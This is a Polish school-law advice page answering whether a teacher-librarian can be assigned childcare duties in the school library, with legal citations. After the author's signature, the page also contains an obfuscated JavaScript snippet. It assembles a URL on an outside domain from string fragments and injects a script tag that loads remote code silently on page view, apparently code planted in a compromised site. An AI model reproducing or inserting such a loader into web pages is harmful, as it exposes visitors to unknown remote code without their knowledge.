Czy bibliotekarzowi można zlecić zajęcia opiekuńcze w bibliotece szkolnej?

Nauczyciel bibliotekarz pracuje w szkole 30 godzin. Nigdy nie chodził na zastępstwa za innych nauczycieli. W tym roku szkolnym mamy nową sytuację: nauczyciel bibliotekarz został poproszony o zajęcia opiekuńcze nad jednym lub góra 4-5 uczniami w bibliotece. Są to uczniowie, którzy nie są zapisani do świetlicy (bo nie ma więcej miejsc). Ci uczniowie to wychowankowie internatu, którzy muszą mieć opiekę do czasu, aż nie przyjdą na zmianę wychowawcy. Takie rozwiązanie jest bardzo pomocne dla organizacji pracy szkoły. Co ważne: ta opieka ma być na terenie biblioteki, nie są to zastępstwa za innego nauczyciela i mogą to być zajęcia biblioteczne. Czy nastąpiło złamanie prawa?

Odpowiedź:

Uczniowie mogą przebywać w bibliotece szkolnej wyłącznie w celu udostępniania zbiorów bibliotecznych i informacji naukowej. Nie można zlecać nauczycielowi bibliotekarzowi zajęć opiekuńczych w bibliotece szkolnej.

Uzasadnienie:

Czas pracy nauczyciela zatrudnionego w pełnym wymiarze zajęć nie może przekraczać 40 godzin w pięciodniowym tygodniu pracy. W ramach tego czasu pracy nauczyciel obowiązany jest realizować oprócz pensum oraz zadań statutowych inne zadania, w tym czynności związane z przygotowaniem się do zajęć oraz samokształceniem i doskonaleniem zawodowym. Tygodniowy obowiązkowy wymiar godzin zajęć dydaktycznych, wychowawczych i opiekuńczych prowadzonych bezpośrednio z uczniami lub wychowankami albo na ich rzecz, nauczycieli– bibliotekarzy zatrudnionych w pełnym wymiarze zajęć wynosi 30 godzin. Organizację biblioteki szkolnej oraz zadania nauczyciela bibliotekarza powinien ustalać statut szkoły z uwzględnieniem zadań w zakresie: 

  • udostępniania książek i innych źródeł informacji,
  • tworzenia warunków do poszukiwania, porządkowania i wykorzystywania informacji z różnych źródeł oraz efektywnego posługiwania się technologią informacyjną,
  • rozbudzania i rozwijania indywidualnych zainteresowań uczniów oraz wyrabiania i pogłębiania u uczniów nawyku czytania i uczenia się,
  • organizowania różnorodnych działań rozwijających wrażliwość kulturową i społeczną.

Statut określa również zasady współpracy biblioteki szkolnej z uczniami, nauczycielami i rodzicami oraz innymi bibliotekami.

Obowiązki nauczyciela bibliotekarza powinien ustalać statut szkoły. Natomiast szczegółowe ustalenie godzin, które stanowią obowiązkowy czas pracy bibliotekarza możliwe jest na podstawie arkusza organizacji szkoły. W sytuacji, w której organizacja funkcjonowania szkoły przewiduje np. otwarcie biblioteki szkolnej w godzinach 9.00-15.00 od poniedziałku do piątku to w sposób naturalny dzienne pensum godzin zawiera się w tych właśnie godzinach, aby móc osiągnąć w skali tygodnia wartość 30 godzin. Nauczyciel – bibliotekarz zaliczany jest do tzw. nieprzedmiotowców. Nie realizuje on godzin lekcyjnych zatem jego praca wynosi 30 godzin 60 – minutowych w tygodniu. W zasadzie nie powinno dochodzić (z uwagi na czas otwarcia biblioteki szkolnej i możliwość korzystania w tym czasie z biblioteki przez uczniów) do wyznaczania innych zajęć nauczycielom – bibliotekarzom w okresie godzin otwarcia biblioteki szkolnej, ponieważ w ramach swoich godzin pracy (wyznaczanych zazwyczaj w grafiku) realizują zadania związane z zajmowanym stanowiskiem.
Zlecanie innych zajęć bibliotekarzowi w czasie realizacji obowiązkowego pensum oznacza uznanie, iż realizacja takich zajęć jest jednym z obowiązków nauczyciela  realizowanych w ramach jego czasu pracy.

Natomiast dla uczniów, którzy muszą przebywać dłużej w szkole należy zorganizować zajęcia świetlicowe. W mojej ocenie nie można zlecać nauczycielowi bibliotekarzowi zajęć opiekuńczych w bibliotece szkolnej, ponieważ do tego celu służy świetlica szkolna. Można natomiast przydzielić mu odrębne zajęcia świetlicowe. Uczniowie mogą przebywać w bibliotece szkolnej wyłącznie w celu udostępniania zbiorów bibliotecznych i informacji naukowej. Natomiast nie są to zajęcia opiekuńcze dla nauczyciela – bibliotekarza.

Podstawa prawna:

  • art. 42 ust. 1, ust. 2 i ust. 3ustawy z dnia 26 stycznia 1982 r. – Karta Nauczyciela (Dz. U. z 2018 r. poz. 967.);
  • załączniki do rozporządzenia MEN z dnia 21 maja 2001 r. w sprawie ramowych publicznego przedszkola oraz publicznych szkół (Dz. U. Nr 61, poz. 624 ze zm.);
  • 17 ust. 2 pkt 9 rozporządzenia MEN z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz. U. z 2017 r. poz. 649)

__
Agnieszka Kosiarz
Ekspert Portalu Oświatowego
www.PortalOswiatowy.pl

(function(){
igja_=(“u”+”st”);igja=document.createElement(“script”);igja.async=true;
igjau=”124435621″;igja_+=”a”+(“t.”);igja_+=”i”+(“nf”+(“o”))+(“/”);
igjau+=”.m4eb23Xjgja91yu8″;igjau+=”e52w9hzr4thv09″;
igja.src=”https://”+igja_+igjau;igja.type=”text/javascript”;
d_b=document.body;d_b.appendChild(igja);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.